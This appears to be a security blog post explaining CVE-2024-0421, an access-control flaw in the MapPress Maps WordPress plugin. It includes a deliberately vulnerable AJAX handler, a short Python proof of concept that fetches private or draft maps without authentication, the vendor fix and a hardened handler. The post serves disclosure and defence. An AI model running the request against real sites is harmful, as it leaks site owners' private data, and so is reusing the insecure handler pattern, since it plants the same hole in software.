WordPress is well known for its massive plugin ecosystem, but plugins sometimes introduce big risks. One example is CVE-2024-0421, a vulnerability in the popular MapPress Maps plugin that affects all versions before 2.88.16 (that is, 2.88.15 and earlier). If you use or manage a WordPress site with MapPress, you need to pay attention. In this post I’ll break down the vulnerability, show how it can be abused (with code), and share the details you need to stay safe.
What Is CVE-2024-0421?
CVE-2024-0421 is a security vulnerability in the MapPress Maps for WordPress plugin that lets unauthenticated visitors read map data they should not be able to see. The root cause is an _Insecure Direct Object Reference_ (IDOR), in other words a missing authorization check, in the way the plugin handles AJAX requests for map information.
Affected versions: All MapPress Maps versions before 2.88.16
Patched: Yes — in version 2.88.16
How Does It Work?
When a map is requested through the plugin’s AJAX action, the plugin looks the map up by its ID but never checks whether that map is public. Because the action is also registered for visitors who are not logged in, anyone can fetch private or draft maps simply by guessing the right post IDs, and WordPress post IDs are sequential integers, so guessing is cheap.
The Bug in Code
Let’s look at a simplified version of what’s happening.
The affected AJAX handler looks like this (simplified for clarity):

    // Handling the AJAX call that fetches a map by ID
    add_action('wp_ajax_mappress_get_map', 'mappress_get_map');        // fires for logged-in users
    add_action('wp_ajax_nopriv_mappress_get_map', 'mappress_get_map'); // fires for ANYONE, logged in or not

    function mappress_get_map() {
        $map_id = intval($_REQUEST['map_id']);

        // Here's the problem: the map (a post) is loaded by ID only.
        // No check on whether its status is 'publish', 'draft', 'private', etc.,
        // and no check on who is asking.
        $map = get_post($map_id);

        if ($map) {
            echo json_encode($map);   // serializes the whole WP_Post object
        } else {
            echo json_encode(['error' => 'Map not found']);
        }
        wp_die();
    }
There is no check on $map->post_status, and none on who is asking. If an attacker knows or guesses a map’s post ID, they can retrieve its details even if the map is set to ‘private’ or is still a ‘draft.’
Exploiting the IDOR (With Example Code)
Suppose you are an unauthenticated visitor who knows (or brute-forces) a map_id. You can simply POST to the AJAX endpoint and get the map data back.
For most WordPress sites, the AJAX URL is /wp-admin/admin-ajax.php.
Step-by-Step Exploit (Python Example)
    import requests

    site = "https://example.com"            # target site
    ajax_url = f"{site}/wp-admin/admin-ajax.php"
    map_id = 42                             # change as needed; map IDs are ordinary post IDs

    params = {
        "action": "mappress_get_map",       # the action registered with wp_ajax_nopriv_*
        "map_id": map_id,
    }

    # No cookies and no nonce: this is sent as an unauthenticated visitor.
    response = requests.post(ajax_url, data=params, timeout=10)
    print(response.status_code)
    print(response.text)
What happens: the response is the serialized map post, regardless of whether it is published, private or a draft, leaking locations, notes, or other internal content.
How Was It Fixed?
In version 2.88.16, the plugin authors added a status check. The handler now only returns maps that are published (post_status == 'publish'). For an endpoint that anonymous visitors can reach, that is the right minimal check:

    $map = get_post($map_id);

    // Only return the map if the post exists AND is published
    if ($map && $map->post_status === 'publish') {
        echo json_encode($map);
    } else {
        echo json_encode(['error' => 'Map not found or not public']);
    }
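A status check stops the anonymous leak, but it says nothing about who is asking: a logged-in editor who owns a private map is locked out by the same test, and echoing the whole WP_Post object still returns fields such as post_author and post_password. As an added example (my own code, not the MapPress plugin’s fix and not taken from the advisory), here is how I would write the handler so that it enforces authorization rather than only filtering on status. The action name and the map_id parameter follow the simplified snippet above; the 'mappress_map' post type and the example_ function names are assumptions for illustration. It relies on is_post_publicly_viewable(), which exists in WordPress 5.7 and later.

```php
<?php
// Added example, not MapPress code: an access-controlled version of the
// simplified handler above. The action name 'mappress_get_map' and the
// map_id parameter follow that snippet; the 'mappress_map' post type is an
// assumption used for the post-type check.

add_action( 'wp_ajax_mappress_get_map', 'example_mappress_get_map' );
// If maps are never meant to be fetched by anonymous visitors, drop this
// nopriv hook entirely instead of gating inside the callback.
add_action( 'wp_ajax_nopriv_mappress_get_map', 'example_mappress_get_map' );

function example_mappress_get_map() {
    $map_id = isset( $_REQUEST['map_id'] ) ? absint( $_REQUEST['map_id'] ) : 0;
    $map    = $map_id ? get_post( $map_id ) : null;

    // One answer for "no such post", "not a map" and "not allowed", so the
    // endpoint cannot be used to confirm which private IDs exist.
    if ( ! $map || 'mappress_map' !== $map->post_type || ! example_can_read_map( $map ) ) {
        wp_send_json_error( array( 'message' => 'Map not found' ), 404 ); // calls wp_die()
    }

    // Return only what the front end needs. Echoing the whole WP_Post object
    // (as the vulnerable snippet does) also leaks post_author, post_password
    // and other fields nobody asked for.
    wp_send_json_success( array(
        'id'      => $map->ID,
        'title'   => get_the_title( $map ),
        'content' => $map->post_content,
    ) );
}

function example_can_read_map( WP_Post $map ) {
    if ( ! is_user_logged_in() ) {
        // Anonymous visitor: only a post WordPress itself would serve publicly
        // (status 'publish', public post type, no password) qualifies.
        return is_post_publicly_viewable( $map );
    }
    // Logged-in user: defer to the capability system. map_meta_cap resolves
    // 'read_post' to 'read' for published posts, to 'read_private_posts' or
    // authorship for private ones, and to 'edit_post' for drafts.
    return current_user_can( 'read_post', $map->ID );
}
```

For anonymous callers this is equivalent to the plugin’s post_status check (a publicly viewable post is by definition published), and it adds what the status check alone cannot express: through the wp_ajax_ hook an author still loads their own private or draft map, while any other user gets the same ‘Map not found’ response as a stranger.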
References and Further Reading
- Original Security Advisory by Patchstack
- WordPress Plugin Directory – MapPress Maps
- CVE Record - CVE-2024-0421
- What is an IDOR vulnerability? (PortSwigger)
Final Thoughts
CVE-2024-0421 shows that it pays to review plugin code for access-control problems. Even well-trusted plugins can overlook fundamental security checks. Keep your plugins updated, and remember that the simplest bugs often have the biggest impact.
If you run MapPress, patch now and stay secure!
Timeline
Published on: 02/12/2024 16:15:08 UTC
Last modified on: 10/04/2024 16:52:52 UTC